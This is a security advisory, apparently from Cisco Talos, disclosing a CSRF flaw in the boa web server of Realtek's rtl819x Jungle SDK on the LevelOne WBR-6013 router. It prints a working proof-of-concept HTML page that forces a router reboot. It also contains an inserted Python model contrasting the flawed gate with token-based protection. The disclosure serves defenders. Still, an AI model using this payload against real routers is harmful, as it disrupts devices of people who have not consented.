Talos Vulnerability Report

TALOS-2023-1872

Realtek rtl819x Jungle SDK boa CSRF protection cross-site request forgery (CSRF) vulnerability

July 8, 2024
CVE Number

CVE-2023-47677

SUMMARY

A cross-site request forgery (CSRF) vulnerability exists in the boa CSRF protection functionality of Realtek rtl819x Jungle SDK v3.4.11. A specially crafted network request can lead to CSRF. An attacker can send an HTTP request to trigger this vulnerability.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

LevelOne WBR-6013 RER4_A_v3411b_2T2R_LEV_09_170623
Realtek rtl819x Jungle SDK v3.4.11

PRODUCT URLS

rtl819x Jungle SDK - https://www.realtek.com/en/
WBR-6013 - https://www.level1.com/level1_en/wbr-6013-n300-wireless-router-54069103

CVSSv3 SCORE

8.8 - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE

CWE-352 - Cross-Site Request Forgery (CSRF)

DETAILS

The rtl819x Jungle SDK is an SDK for routers. This SDK uses boa as its web server.

This Realtek rtl819x Jungle SDK vulnerability was found while researching the LevelOne WBR-6013 router. We explain the vulnerability from the perspective of the WBR-6013 router.

The WBR-6013 router runs the boa web server. boa implements a CSRF mechanism that rejects calls to an API endpoint until an HTML page containing a form for that endpoint has been loaded.

This mechanism does not actually prevent CSRF. An attacker's page can first load the HTML page that enables the desired API, bypassing the gate, and then submit the actual request against that API.

<html>
    <body>
        <form id='csrf' action="http://<DEVICE_IP>/boafrm/formSysCmd" method="POST">
            <input type="hidden" name="sysCmd" value="reboot" />
        </form>
        <iframe
            src="http://<DEVICE_IP>/syscmd.htm">
        </iframe>
        <script>
            setTimeout(() => document.getElementById("csrf").submit(), 2000)
        </script>
    </body>
</html>

In most browsers, visiting the HTML page above causes the browser to attach the cached Authorization header to both requests. The victim's browser first loads the syscmd.htm page in the iframe, which enables the /boafrm/formSysCmd endpoint. After 2 seconds the script submits the form, sending a POST to the /boafrm/formSysCmd API and rebooting the router.
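To make the design flaw concrete, the following Python model is an added example and is not Talos's, Realtek's or LevelOne's code. It models the boa "page-load" gate described above next to a synchronizer-token check, and replays the two requests the HTML page makes (iframe GET, then form POST) with the victim's ambient credentials attached. The host names, the session identifiers and the csrf_token field name are constructed for the example; the gate semantics are only those the advisory states.

```python
"""Model of the page-load CSRF gate versus a synchronizer token.

Constructed example: no real boa code or network traffic is involved.
A "session" string stands in for the credentials the browser attaches
automatically (here, the cached Authorization header).
"""
import hmac
import secrets

DEVICE_ORIGIN = "http://device.local"          # stands in for http://<DEVICE_IP>
ATTACKER_ORIGIN = "http://attacker.example"    # hypothetical cross-site origin
FORM_PAGES = {"/syscmd.htm": "/boafrm/formSysCmd"}  # HTML page -> API it enables


class PageLoadGate:
    """boa-style gate as described in the advisory: an API endpoint becomes
    callable for a session once the HTML page carrying its form was fetched."""

    def __init__(self):
        self.enabled = {}  # session -> set of enabled API paths

    def get(self, session, path):
        if path in FORM_PAGES:
            self.enabled.setdefault(session, set()).add(FORM_PAGES[path])
        return 200, ""  # (status, page body); the page carries no token

    def post(self, session, path, form, headers):
        # The only check is "was the form page loaded in this session?"
        if path in self.enabled.get(session, set()):
            return 200
        return 403


class TokenGate:
    """Synchronizer token: the form page embeds a random per-session token and
    the POST handler requires it back. A POST whose Origin header names a
    foreign site is rejected as well (defence in depth)."""

    def __init__(self):
        self.tokens = {}  # session -> token issued with the form page

    def get(self, session, path):
        if path in FORM_PAGES:
            token = self.tokens.setdefault(session, secrets.token_hex(16))
            return 200, token  # token is part of the page body
        return 200, ""

    def post(self, session, path, form, headers):
        origin = headers.get("Origin")
        if origin is not None and origin != DEVICE_ORIGIN:
            return 403
        expected = self.tokens.get(session)
        supplied = form.get("csrf_token", "")
        if expected is None or not hmac.compare_digest(expected, supplied):
            return 403
        return 200


def forged_reboot(server, session="victim-session"):
    """Replays the attacker page: iframe GET, then the form POST. The browser
    attaches the victim's credentials to both, but the script runs on
    ATTACKER_ORIGIN and cannot read the iframe's body (same-origin policy)."""
    server.get(session, "/syscmd.htm")        # response body unreadable cross-origin
    form = {"sysCmd": "reboot"}               # no token: the attacker never saw one
    headers = {"Origin": ATTACKER_ORIGIN}     # browsers set Origin on cross-site POSTs
    return server.post(session, "/boafrm/formSysCmd", form, headers)


def legitimate_reboot(server, session="admin-session"):
    """The administrator uses the device's own page, so the token is readable."""
    _, token = server.get(session, "/syscmd.htm")
    form = {"sysCmd": "reboot", "csrf_token": token}
    headers = {"Origin": DEVICE_ORIGIN}
    return server.post(session, "/boafrm/formSysCmd", form, headers)


if __name__ == "__main__":
    for gate in (PageLoadGate, TokenGate):
        print(gate.__name__, "forged:", forged_reboot(gate()),
              "legitimate:", legitimate_reboot(gate()))
```

Running the model shows the page-load gate returning 200 to the forged request, because the state it checks (page was loaded) is something any origin can produce with a plain GET, while the token gate returns 403 for the forgery and 200 for the administrator. The property a CSRF defence needs is a value the attacking origin cannot obtain or predict, which is what the per-session token provides; the Origin check is an additional, cheaper layer rather than a replacement.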

VENDOR RESPONSE

Realtek has provided updated software to their customers. LevelOne has declined to patch the issues in their software.

TIMELINE

2023-12-14 - Initial Vendor Contact
2023-12-22 - Vendor Disclosure
2024-05-20 - Vendor Patch Release
2024-07-08 - Public Release

Credit

Discovered by Francesco Benvenuto of Cisco Talos.